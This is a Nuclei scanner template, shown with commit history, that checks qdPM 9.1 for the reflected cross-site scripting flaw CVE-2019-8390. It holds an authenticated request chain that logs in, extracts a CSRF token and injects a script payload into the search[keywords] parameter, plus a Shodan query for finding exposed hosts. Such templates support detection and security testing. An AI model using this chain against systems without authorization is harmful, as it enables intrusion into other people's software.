nuclei-templates/http/cves/2019/CVE-2019-8390.yaml

78 lines
2.5 KiB
YAML
Raw Normal View History

2023-07-07 09:38:49 +00:00
id: CVE-2019-8390
info:
name: qdPM 9.1 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:53:28 +00:00
remediation: |
Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor.
2023-07-07 09:38:49 +00:00
reference:
- https://www.exploit-db.com/exploits/46399/
- http://qdpm.net/download-qdpm-free-project-management
- https://nvd.nist.gov/vuln/detail/CVE-2019-8390
2023-07-11 19:49:27 +00:00
- http://sourceforge.net/projects/qdpm
2023-07-07 09:38:49 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-8390
cwe-id: CWE-79
2023-10-14 11:27:55 +00:00
epss-score: 0.0161
epss-percentile: 0.86055
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:*
2023-07-07 09:38:49 +00:00
metadata:
verified: true
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: qdpm
product: qdpm
2023-09-06 12:53:28 +00:00
shodan-query: http.favicon.hash:762074255
2023-07-07 09:38:49 +00:00
tags: cve,cve2019,xss,qdpm,authenticated,edb
http:
- raw:
- |
GET /index.php/login HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=
- |
POST /index.php/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
search[keywords]=e"><script>alert(document.domain)</script>&search_by_extrafields[]=9
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'alert alert-info alert-search-result'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="login\[_csrf_token\]" value="(.*?)"'
internal: true
2023-07-11 19:49:27 +00:00
part: body
# digest: 490a004630440220319ddc01421d560a611845b75f4fec2f5f6aeb8b3fdb100539e7dbb3c814908f02204f8ba6683a6267f7d3ebd53b6ca5f9474e0f712743f8205590d0951ae8a38931:922c64590222798bb761d5b6d8e72950